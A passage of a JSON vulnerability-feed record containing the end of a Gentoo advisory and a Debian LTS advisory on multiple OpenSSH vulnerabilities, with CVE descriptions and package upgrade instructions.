\n\n### Impact\n\nRemote attackers could cause Denial of Service and conduct user enumeration. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.3_p1-r7\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-18", "id": "GLSA-201612-18", "type": "gentoo", "title": "OpenSSH: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:03:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Package : openssh\nVersion : 1:6.7p1-5+deb8u6\nCVE ID : CVE-2015-5352 CVE-2015-5600 CVE-2015-6563 CVE-2015-6564\n CVE-2016-1908 CVE-2016-3115 CVE-2016-6515 CVE-2016-10009\n CVE-2016-10011 CVE-2016-10012 CVE-2016-10708\n CVE-2017-15906\nDebian Bug : 790798 793616 795711 848716 848717\n\n\nSeveral vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\n OpenSSH incorrectly verified time window deadlines for X connections.\n Remote attackers could take advantage of this flaw to bypass intended\n access restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\n OpenSSH improperly restricted the processing of keyboard-interactive\n devices within a single connection, which could allow remote attackers\n to perform brute-force attacks or cause a denial of service, in a\n non-default configuration.\n\nCVE-2015-6563\n\n OpenSSH incorrectly handled usernames during PAM authentication. 
In\n conjunction with an additional flaw in the OpenSSH unprivileged child\n process, remote attackers could make use if this issue to perform user\n impersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\n Moritz Jodeit discovered a use-after-free flaw in PAM support in\n OpenSSH, that could be used by remote attackers to bypass\n authentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\n OpenSSH mishandled untrusted X11 forwarding when the X server disables\n the SECURITY extension. Untrusted connections could obtain trusted X11\n forwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\n OpenSSH improperly handled X11 forwarding data related to\n authentication credentials. Remote authenticated users could make use\n of this flaw to bypass intended shell-command restrictions. Identified\n by github.com/tintinweb.\n\nCVE-2016-6515\n\n OpenSSH did not limit password lengths for password authentication.\n Remote attackers could make use of this flaw to cause a denial of\n service via long strings.\n\nCVE-2016-10009\n\n Jann Horn discovered an untrusted search path vulnerability in\n ssh-agent allowing remote attackers to execute arbitrary local\n PKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\n Jann Horn discovered that OpenSSH did not properly consider the\n effects of realloc on buffer contents. 
This may allow local users to\n obtain sensitive private-key information by leveraging access to a\n privilege-separated child process.\n\nCVE-2016-10012\n\n Guido Vranken discovered that the OpenSSH shared memory manager\n did not ensure that a bounds check was enforced by all compilers,\n which could allow local users to gain privileges by leveraging access\n to a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\n NULL pointer dereference and daemon crash via an out-of-sequence\n NEWKEYS message.\n\nCVE-2017-15906\n\n Michal Zalewski reported that OpenSSH improperly prevent write\n operations in readonly mode, allowing attackers to create zero-length\n files.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-09-10T08:45:03", "published": "2018-09-10T08:45:03", "id": "DEBIAN:DLA-1500-1:E6BD7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201809/msg00010.html", "title": "[SECURITY] [DLA 1500-1] openssh security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}]}